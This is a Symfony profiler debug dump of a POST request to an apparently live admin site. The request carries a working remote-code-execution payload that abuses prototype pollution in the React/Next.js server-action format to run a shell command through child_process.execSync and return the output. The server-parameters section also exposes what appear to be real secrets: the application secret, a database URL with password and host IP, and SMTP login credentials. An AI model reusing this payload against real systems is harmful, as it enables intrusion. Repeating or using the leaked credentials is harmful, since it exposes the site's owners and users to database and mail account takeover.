POST https://visconti-admin.slapp.me/

DefaultController :: home

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var res=process.mainModule.require('child_process').execSync('echo VULN_1770028129_7649',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\": \"$B0\"}"}"
1
""$@0""

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"App\Controller\DefaultController::home"
_firewall_context
"security.firewall.map.context.main"
_route
"default_home"
_route_params
[]
_security_firewall_run
"_security_main"
_stopwatch_token
"7c47c6"

Request Headers

Header Value
accept
"text/x-component"
accept-encoding
"gzip"
accept-language
"en-US,en;q=0.9"
connection
"close"
content-length
"648"
content-type
"multipart/form-data; boundary=5df536a52651b7089343c9195d5fa6abb64d5037fa6c43411c46a46b256f"
host
"visconti-admin.slapp.me"
next-action
"x"
origin
"https://visconti-admin.slapp.me"
referer
"https://visconti-admin.slapp.me"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Mon, 02 Feb 2026 10:28:49 GMT"
location
"/app/"
x-debug-token
"2329c9"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"788b4f431561f446c3bf1cdbd30aa344"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"mysql://slapp:652yfc4FKVeR@51.210.179.191:3306/visconti?serverVersion=10.11.2-MariaDB"
MAILER_DSN
"smtp://chloe.abdeldjelil%40visconti.partners:cmORFwNYDC3vATV9@smtp-relay.brevo.com:587"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"648"
CONTENT_TYPE
"multipart/form-data; boundary=5df536a52651b7089343c9195d5fa6abb64d5037fa6c43411c46a46b256f"
CONTEXT_DOCUMENT_ROOT
"/home/slapp/www/visconti/admin/htdocs/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/home/slapp/www/visconti/admin/htdocs/public"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT
"text/x-component"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_ACCEPT_LANGUAGE
"en-US,en;q=0.9"
HTTP_CONNECTION
"close"
HTTP_HOST
"visconti-admin.slapp.me"
HTTP_NEXT_ACTION
"x"
HTTP_ORIGIN
"https://visconti-admin.slapp.me"
HTTP_REFERER
"https://visconti-admin.slapp.me"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_HTTPS
"on"
REDIRECT_SCRIPT_URI
"https://visconti-admin.slapp.me/"
REDIRECT_SCRIPT_URL
"/"
REDIRECT_SSL_TLS_SNI
"visconti-admin.slapp.me"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/"
REMOTE_ADDR
"85.11.167.4"
REMOTE_PORT
"47040"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1770028129
REQUEST_TIME_FLOAT
1770028129.4834
REQUEST_URI
"/"
SCRIPT_FILENAME
"/home/slapp/www/visconti/admin/htdocs/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://visconti-admin.slapp.me/"
SCRIPT_URL
"/"
SERVER_ADDR
"51.210.179.191"
SERVER_ADMIN
"webmaster@slapp.me"
SERVER_NAME
"visconti-admin.slapp.me"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.66 (Debian) Server at visconti-admin.slapp.me Port 443</address>\n"
SERVER_SOFTWARE
"Apache/2.4.66 (Debian)"
SSL_TLS_SNI
"visconti-admin.slapp.me"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,CORS_ALLOW_ORIGIN"